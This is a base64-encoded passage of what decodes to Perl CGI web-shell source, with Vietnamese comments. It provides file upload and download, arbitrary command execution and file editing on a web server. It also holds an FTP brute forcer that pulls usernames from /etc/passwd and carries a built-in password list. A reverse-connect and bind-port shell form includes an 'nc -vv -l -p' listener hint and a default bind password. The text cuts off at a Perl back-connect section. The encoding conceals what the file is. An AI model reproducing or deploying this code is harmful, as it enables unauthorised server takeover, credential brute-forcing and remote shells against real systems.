IGEgbGluayB0aHJvdWdoIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLgojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsCiMgdGhlIGZpbGUgaXMgcmVhZCBhbmQgc2VudCB0byB0aGUgYnJvd3Nlci4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgQmVnaW5Eb3dubG9hZAp7CgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwKCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUKCXsKCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7Cgl9CgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQoJewoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsKCX0KCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQoJewoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7Cgl9CgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQoJewoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlLiBJZiB0aGUKIyBmaWxlIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGEKIyBmaWxlLCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgVXBsb2FkRmlsZQp7CgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgdXBsb2FkIGZvcm0gYWdhaW4KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpCgl7CgkJcmV0dXJuICZQcmludEZpbGVVcGxvYWRGb3JtOwoKCX0KCW15ICRyZXN1bHQ9IiI7CgkjIHN0YXJ0IHRoZSB1cGxvYWRpbmcgcHJvY2VzcwoJJHJlc3VsdCAuPSAiVXBsb2FkaW5nICRUcmFuc2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsKCgkjIGdldCB0aGUgZnVsbGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBjcmVhdGVkCgljaG9wKCRUYXJnZXROYW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsKCSRUcmFuc2ZlckZpbGUgPX4gbSEoW14vXlxcXSopJCE7CgkkVGFyZ2V0TmFtZSAuPSAkUGF0aFNlcC4kMTsKCgkkVGFyZ2V0RmlsZVNpemUgPSBsZW5ndGgoJGlueydmaWxlZGF0YSd9KTsKCSMgaWYgdGhlIGZpbGUgZXhpc3RzIGFuZCB3ZSBhcmUgbm90IHN1cHBvc2VkIHRvIG92ZXJ3cml0ZSBpdAoJaWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpCgl7CgkJJHJlc3VsdCAuPSAiRmFpbGVkOiBEZXN0aW5hdGlvbiBmaWxlIGFscmVhZHkgZXhpc3RzLjxicj4iOwoJfQoJZWxzZSAjIGZpbGUgaXMgbm90IHByZXNlbnQKCXsKCQlpZihvcGVuKFVQTE9BREZJTEUsICI+JFRhcmdldE5hbWUiKSkKCQl7CgkJCWJpbm1vZGUoVVBMT0FERklMRSkgaWYgJFdpbk5UOwoJCQlwcmludCBVUExPQURGSUxFICRpbnsnZmlsZWRhdGEnfTsKCQkJY2xvc2UoVVBMT0FERklMRSk7CgkJCSRyZXN1bHQgLj0gIlRyYW5zZmVyZWQgJFRhcmdldEZpbGVTaXplIEJ5dGVzLjxicj4iOwoJCQkkcmVzdWx0IC49ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7CgkJfQoJCWVsc2UKCQl7CgkJCSRyZXN1bHQgLj0gIkZhaWxlZDogJCE8YnI+IjsKCQl9Cgl9CgkkcmVzdWx0IC49ICZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJcmV0dXJuICRyZXN1bHQ7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZS4gSWYgdGhlCiMgZmlsZW5hbWUgaXMgbm90IHNwZWNpZmllZCwgaXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQojIGZpbGUsIG90aGVyd2lzZSBpdCBkaXNwbGF5cyBhIG1lc3NhZ2UgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluawojIHRocm91Z2ggIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBEb3dubG9hZEZpbGUKewoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwgcHJpbnQgdGhlIGRvd25sb2FkIGZvcm0gYWdhaW4KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpCgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCXJldHVybiAmUHJpbnRGaWxlRG93bmxvYWRGb3JtOwoJfQoJCgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwgKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBwYXRoIGlzIGFic29sdXRlCgl7CgkJJFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOwoJfQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUKCXsKCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFyZ2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOwoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7Cgl9CgoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUKCXsKCQlyZXR1cm4gJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsKCX0KCWVsc2UgIyB3ZSBoYXZlIHRvIHNlbmQgb25seSB0aGUgbGluayBwYWdlCgl7CgkJcmV0dXJuICZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHRvIGV4ZWN1dGUgY29tbWFuZHMuIEl0IGRpc3BsYXlzIHRoZSBvdXRwdXQgb2YgdGhlCiMgY29tbWFuZCBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGFub3RoZXIgY29tbWFuZC4gVGhlIGNoYW5nZSBkaXJlY3RvcnkKIyBjb21tYW5kIGlzIGhhbmRsZWQgZGlmZmVyZW50bHkuIEluIHRoaXMgY2FzZSwgdGhlIG5ldyBkaXJlY3RvcnkgaXMgc3RvcmVkIGluCiMgYW4gaW50ZXJuYWwgdmFyaWFibGUgYW5kIGlzIHVzZWQgZWFjaCB0aW1lIGEgY29tbWFuZCBoYXMgdG8gYmUgZXhlY3V0ZWQuIFRoZQojIG91dHB1dCBvZiB0aGUgY2hhbmdlIGRpcmVjdG9yeSBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQgdG8gdGhlIHVzZXJzCiMgdGhlcmVmb3JlIGVycm9yIG1lc3NhZ2VzIGNhbm5vdCBiZSBkaXNwbGF5ZWQuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEV4ZWN1dGVDb21tYW5kCnsKCW15ICRyZXN1bHQ9IiI7CglpZigkUnVuQ29tbWFuZCA9fiBtL15ccypjZFxzKyguKykvKSAjIGl0IGlzIGEgY2hhbmdlIGRpciBjb21tYW5kCgl7CgkJIyB3ZSBjaGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQoJCSMgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkLgoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4iY2QgJDEiLiRDbWRTZXAuJENtZFB3ZDsKCQljaG9wKCRDdXJyZW50RGlyID0gYCRDb21tYW5kYCk7CgkJJHJlc3VsdCAuPSAmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsKCgkJJHJlc3VsdCAuPSAiQ29tbWFuZDogPHJ1bj4kUnVuQ29tbWFuZCA8L3J1bj48YnI+PHRleHRhcmVhIGNvbHM9JyRjb2xzJyByb3dzPSckcm93cycgc3BlbGxjaGVjaz0nZmFsc2UnPiI7CgkJIyB4dWF0IHRob25nIHRpbiBraGkgY2h1eWVuIGRlbiAxIHRodSBtdWMgbmFvIGRvIQoJCSRSdW5Db21tYW5kPSAkV2luTlQ/ImRpciI6ImRpciAtbGlhIjsKCQkkcmVzdWx0IC49ICZSdW5DbWQ7Cgl9ZWxzaWYoJFJ1bkNvbW1hbmQgPX4gbS9eXHMqZWRpdFxzKyguKykvKQoJewoJCSRyZXN1bHQgLj0gICZTYXZlRmlsZUZvcm07Cgl9ZWxzZQoJewoJCSRyZXN1bHQgLj0gJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJHJlc3VsdCAuPSAiQ29tbWFuZDogPHJ1bj4kUnVuQ29tbWFuZDwvcnVuPjxicj48dGV4dGFyZWEgaWQ9J2RhdGEnIGNvbHM9JyRjb2xzJyByb3dzPSckcm93cycgc3BlbGxjaGVjaz0nZmFsc2UnPiI7CgkJJHJlc3VsdCAuPSZSdW5DbWQ7Cgl9CgkkcmVzdWx0IC49ICAiPC90ZXh0YXJlYT4iOwoJcmV0dXJuICRyZXN1bHQ7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBydW4gY29tbWFuZAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgpzdWIgUnVuQ21kCnsKCW15ICRyZXN1bHQ9IiI7CgkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuJFJ1bkNvbW1hbmQuJFJlZGlyZWN0b3I7CglpZighJFdpbk5UKQoJewoJCSRTSUd7J0FMUk0nfSA9IFwmQ29tbWFuZFRpbWVvdXQ7CgkJYWxhcm0oJENvbW1hbmRUaW1lb3V0RHVyYXRpb24pOwoJfQoJaWYoJFNob3dEeW5hbWljT3V0cHV0KSAjIHNob3cgb3V0cHV0IGFzIGl0IGlzIGdlbmVyYXRlZAoJewoJCSR8PTE7CgkJJENvbW1hbmQgLj0gIiB8IjsKCQlvcGVuKENvbW1hbmRPdXRwdXQsICRDb21tYW5kKTsKCQl3aGlsZSg8Q29tbWFuZE91dHB1dD4pCgkJewoJCQkkXyA9fiBzLyhcbnxcclxuKSQvLzsKCQkJJHJlc3VsdCAuPSAmSHRtbFNwZWNpYWxDaGFycygiJF9cbiIpOwoJCX0KCQkkfD0wOwoJfQoJZWxzZSAjIHNob3cgb3V0cHV0IGFmdGVyIGNvbW1hbmQgY29tcGxldGVzCgl7CgkJJHJlc3VsdCAuPSAmSHRtbFNwZWNpYWxDaGFycygnJENvbW1hbmQnKTsKCX0KCWlmKCEkV2luTlQpCgl7CgkJYWxhcm0oMCk7Cgl9CglyZXR1cm4gJHJlc3VsdDsKfQojPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09CiMgRm9ybSBTYXZlIEZpbGUgCiM9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0Kc3ViIFNhdmVGaWxlRm9ybQp7CglteSAkcmVzdWx0ID0iIjsKCXN1YnN0cigkUnVuQ29tbWFuZCwwLDUpPSIiOwoJbXkgJGZpbGU9JnRyaW0oJFJ1bkNvbW1hbmQpOwoJJHNhdmU9Jzxicj48aW5wdXQgbmFtZT0iYSIgdHlwZT0ic3VibWl0IiB2YWx1ZT0ic2F2ZSIgY2xhc3M9InN1Ym1pdCIgPic7CgkkRmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4kUnVuQ29tbWFuZDsKCW15ICRkaXI9IjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+Ii4mQWRkTGlua0RpcigiZ3VpIikuIjwvc3Bhbj4iOwoJaWYoLXcgJEZpbGUpCgl7CgkJJHJvd3M9IjIzIgoJfWVsc2UKCXsKCQkkbXNnPSI8YnI+PGZvbnQgc3R5bGU9J2ZvbnQ6IDE1cHQgVmVyZGFuYTsgY29sb3I6IHllbGxvdzsnID4gUGVybWlzc2lvbiBkZW5pZWQhPGZvbnQ+PGJyPiI7CgkJJHJvd3M9IjIwIgoJfQoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICI8Zm9udCBjb2xvcj0nI0ZGRkZGRic+W2FkbWluXEAkU2VydmVyTmFtZSAkZGlyXVwkPC9mb250PiAiOwoJJHJlYWQ9KCRXaW5OVCk/InR5cGUiOiJsZXNzIjsKCSRSdW5Db21tYW5kID0gIiRyZWFkIFwiJFJ1bkNvbW1hbmRcIiI7CgkkcmVzdWx0IC49ICA8PEVORDsKCTxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgoKCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CgkkUHJvbXB0Cgk8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iNDAiIG5hbWU9ImMiPgoJPGlucHV0IG5hbWU9InMiIGNsYXNzPSJzdWJtaXQiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KCTxicj5Db21tYW5kOiA8cnVuPiAkUnVuQ29tbWFuZCA8L3J1bj4KCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImZpbGUiIHZhbHVlPSIkZmlsZSIgPiAkc2F2ZSA8YnI+ICRtc2cKCTxicj48dGV4dGFyZWEgaWQ9ImRhdGEiIG5hbWU9ImRhdGEiIGNvbHM9IiRjb2xzIiByb3dzPSIkcm93cyIgc3BlbGxjaGVjaz0iZmFsc2UiPgpFTkQKCQoJJHJlc3VsdCAuPSAmUnVuQ21kOwoJJHJlc3VsdCAuPSAgIjwvdGV4dGFyZWE+IjsKCSRyZXN1bHQgLj0gICI8L2Zvcm0+IjsKCXJldHVybiAkcmVzdWx0Owp9CiM9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0KIyBTYXZlIEZpbGUKIz09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQpzdWIgU2F2ZUZpbGUoJCkKewoJbXkgJERhdGE9IHNoaWZ0IDsKCW15ICRGaWxlPSBzaGlmdDsKCSRGaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiRGaWxlOwoJaWYob3BlbihGSUxFLCAiPiRGaWxlIikpCgl7CgkJYmlubW9kZSBGSUxFOwoJCXByaW50IEZJTEUgJERhdGE7CgkJY2xvc2UgRklMRTsKCQlyZXR1cm4gMTsKCX1lbHNlCgl7CgkJcmV0dXJuIDA7Cgl9Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIEJydXRlIEZvcmNlciBGb3JtCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEJydXRlRm9yY2VyRm9ybQp7CglteSAkcmVzdWx0PSIiOwoJJHJlc3VsdCAuPSA8PEVORDsKCjx0YWJsZT4KCjx0cj4KPHRkIGNvbHNwYW49IjIiIGFsaWduPSJjZW50ZXIiPgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyM8YnI+ClNpbXBsZSBGVFAgYnJ1dGUgZm9yY2VyPGJyPgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+Cgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iYnJ1dGVmb3JjZXIiLz4KPC90ZD4KPC90cj4KPHRyPgo8dGQ+VXNlcjo8YnI+PHRleHRhcmVhIHJvd3M9IjE4IiBjb2xzPSIzMCIgbmFtZT0idXNlciI+CkVORApjaG9wKCRyZXN1bHQgLj0gYGxlc3MgL2V0Yy9wYXNzd2QgfCBjdXQgLWQ6IC1mMWApOwokcmVzdWx0IC49IDw8J0VORCc7CjwvdGV4dGFyZWE+PC90ZD4KPHRkPgoKUGFzczo8YnI+Cjx0ZXh0YXJlYSByb3dzPSIxOCIgY29scz0iMzAiIG5hbWU9InBhc3MiPjEyM3Bhc3MKMTIzIUAjCjEyM2FkbWluCjEyM2FiYwoxMjM0NTZhZG1pbgoxMjM0NTU0MzIxCjEyMzQ0MzIxCnBhc3MxMjMKYWRtaW4KYWRtaW5jcAphZG1pbmlzdHJhdG9yCm1hdGtoYXUKcGFzc2FkbWluCnBAc3N3b3JkCnBAc3N3MHJkCnBhc3N3b3JkCjEyMzQ1NgoxMjM0NTY3CjEyMzQ1Njc4CjEyMzQ1Njc4OQoxMjM0NTY3ODkwCjExMTExMQowMDAwMDAKMjIyMjIyCjMzMzMzMwo0NDQ0NDQKNTU1NTU1CjY2NjY2Ngo3Nzc3NzcKODg4ODg4Cjk5OTk5OQoxMjMxMjMKMjM0MjM0CjM0NTM0NQo0NTY0NTYKNTY3NTY3CjY3ODY3OAo3ODk3ODkKMTIzMzIxCjQ1NjY1NAo2NTQzMjEKNzY1NDMyMQo4NzY1NDMyMQo5ODc2NTQzMjEKMDk4NzY1NDMyMQphZG1pbjEyMwphZG1pbjEyMzQ1NgphYmNkZWYKYWJjYWJjCiFAIyFAIwohQCMkJV4KIUAjJCVeJiooCiFAIyQkI0AhCmFiYzEyMwphbmh5ZXVlbQppbG92ZXlvdTwvdGV4dGFyZWE+CjwvdGQ+CjwvdHI+Cjx0cj4KPHRkIGNvbHNwYW49IjIiIGFsaWduPSJjZW50ZXIiPgpTbGVlcDo8c2VsZWN0IG5hbWU9InNsZWVwIj4KCjxvcHRpb24+MDwvb3B0aW9uPgo8b3B0aW9uPjE8L29wdGlvbj4KPG9wdGlvbj4yPC9vcHRpb24+Cgo8b3B0aW9uPjM8L29wdGlvbj4KPC9zZWxlY3Q+IAo8aW5wdXQgdHlwZT0ic3VibWl0IiBjbGFzcz0ic3VibWl0IiB2YWx1ZT0iQnJ1dGUgRm9yY2VyIi8+PC90ZD48L3RyPgo8L2Zvcm0+CjwvdGFibGU+CkVORApyZXR1cm4gJHJlc3VsdDsKfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgQnJ1dGUgRm9yY2VyCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEJydXRlRm9yY2VyCnsKCW15ICRyZXN1bHQ9IiI7CgkkU2VydmVyPSRFTlZ7J1NFUlZFUl9BRERSJ307CglpZigkaW57J3VzZXInfSBlcSAiIikKCXsKCQkkcmVzdWx0IC49ICZCcnV0ZUZvcmNlckZvcm07Cgl9ZWxzZQoJewoJCXVzZSBOZXQ6OkZUUDsgCgkJQHVzZXI9IHNwbGl0KC9cbi8sICRpbnsndXNlcid9KTsKCQlAcGFzcz0gc3BsaXQoL1xuLywgJGlueydwYXNzJ30pOwoJCWNob21wKEB1c2VyKTsKCQljaG9tcChAcGFzcyk7CgkJJHJlc3VsdCAuPSAiPGJyPjxicj5bK10gVHJ5aW5nIGJydXRlICRTZXJ2ZXJOYW1lPGJyPj09PT09PT09PT09PT09PT09PT09Pj4+Pj4+Pj4+Pj4+PDw8PDw8PDw8PD09PT09PT09PT09PT09PT09PT09PGJyPjxicj5cbiI7CgkJZm9yZWFjaCAkdXNlcm5hbWUgKEB1c2VyKQoJCXsKCQkJaWYoISgkdXNlcm5hbWUgZXEgIiIpKQoJCQl7CgkJCQlmb3JlYWNoICRwYXNzd29yZCAoQHBhc3MpCgkJCQl7CgkJCQkJJGZ0cCA9IE5ldDo6RlRQLT5uZXcoJFNlcnZlcikgb3IgZGllICJDb3VsZCBub3QgY29ubmVjdCB0byAkU2VydmVyTmFtZVxuIjsgCgkJCQkJaWYoJGZ0cC0+bG9naW4oIiR1c2VybmFtZSIsIiRwYXNzd29yZCIpKQoJCQkJCXsKCQkJCQkJJHJlc3VsdCAuPSAiPGEgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9J2Z0cDovLyR1c2VybmFtZTokcGFzc3dvcmRcQCRTZXJ2ZXInPlsrXSBmdHA6Ly8kdXNlcm5hbWU6JHBhc3N3b3JkXEAkU2VydmVyPC9hPjxicj5cbiI7CgkJCQkJCSRmdHAtPnF1aXQoKTsKCQkJCQkJYnJlYWs7CgkJCQkJfQoJCQkJCWlmKCEoJGlueydzbGVlcCd9IGVxICIwIikpCgkJCQkJewoJCQkJCQlzbGVlcChpbnQoJGlueydzbGVlcCd9KSk7CgkJCQkJfQoJCQkJCSRmdHAtPnF1aXQoKTsKCQkJCX0KCQkJfQoJCX0KCQkkcmVzdWx0IC49ICJcbjxicj49PT09PT09PT09Pj4+Pj4+Pj4+PiBGaW5pc2hlZCA8PDw8PDw8PDw8PT09PT09PT09PTxicj5cbiI7Cgl9CglyZXR1cm4gJHJlc3VsdDsKfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgQmFja2Nvbm5lY3QgRm9ybQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBCYWNrQmluZEZvcm0KewoJcmV0dXJuIDw8RU5EOwoJPGJyPjxicj4KCgk8dGFibGU+Cgk8dHI+Cgk8Zm9ybSBuYW1lPSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KCTx0ZD5CYWNrQ29ubmVjdDogPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImJhY2tiaW5kIj48L3RkPgoJPHRkPiBIb3N0OiA8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iMjAiIG5hbWU9ImNsaWVudGFkZHIiIHZhbHVlPSIkRU5WeydSRU1PVEVfQUREUid9Ij4KCSBQb3J0OiA8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iNyIgbmFtZT0iY2xpZW50cG9ydCIgdmFsdWU9IjgwIiBvbmtleXVwPSJkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnYmEnKS5pbm5lckhUTUw9dGhpcy52YWx1ZTsiPjwvdGQ+CgoJPHRkPjxpbnB1dCBuYW1lPSJzIiBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkNvbm5lY3QiPjwvdGQ+Cgk8L2Zvcm0+Cgk8L3RyPgoJPHRyPgoJPHRkIGNvbHNwYW49Mz48Zm9udCBjb2xvcj0jRkZGRkZGPlsrXSBDbGllbnQgbGlzdGVuIGJlZm9yZSBjb25uZWN0IGJhY2shCgk8YnI+WytdIFRyeSBjaGVjayB5b3VyIFBvcnQgd2l0aCA8YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3d3dy5jYW55b3VzZWVtZS5vcmcvIj5odHRwOi8vd3d3LmNhbnlvdXNlZW1lLm9yZy88L2E+Cgk8YnI+WytdIENsaWVudCBsaXN0ZW4gd2l0aCBjb21tYW5kOiA8cnVuPm5jIC12diAtbCAtcCA8c3BhbiBpZD0iYmEiPjgwPC9zcGFuPjwvcnVuPjwvZm9udD48L3RkPgoKCTwvdHI+Cgk8L3RhYmxlPgoKCTxicj48YnI+Cgk8dGFibGU+Cgk8dHI+Cgk8Zm9ybSBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KCTx0ZD5CaW5kIFBvcnQ6IDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJiYWNrYmluZCI+PC90ZD4KCgk8dGQ+IFBvcnQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIxNSIgbmFtZT0iY2xpZW50cG9ydCIgdmFsdWU9IjE0MTIiIG9ua2V5dXA9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdiaScpLmlubmVySFRNTD10aGlzLnZhbHVlOyI+CgoJIFBhc3N3b3JkOiA8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iMTUiIG5hbWU9ImJpbmRwYXNzIiB2YWx1ZT0iVEhJRVVHSUFCVU9OIj48L3RkPgoJPHRkPjxpbnB1dCBuYW1lPSJzIiBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkJpbmQiPjwvdGQ+Cgk8L2Zvcm0+Cgk8L3RyPgoJPHRyPgoJPHRkIGNvbHNwYW49Mz48Zm9udCBjb2xvcj0jRkZGRkZGPlsrXSBDaHVjIG5hbmcgY2h1YSBkYyB0ZXN0IQoJPGJyPlsrXSBUcnkgY29tbWFuZDogPHJ1bj5uYyAkRU5WeydTRVJWRVJfQUREUid9IDxzcGFuIGlkPSJiaSI+MTQxMjwvc3Bhbj48L3J1bj48L2ZvbnQ+PC90ZD4KCgk8L3RyPgoJPC90YWJsZT48YnI+CkVORAp9CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBCYWNrY29ubmVjdCB1c2UgcGVybAojLS0tL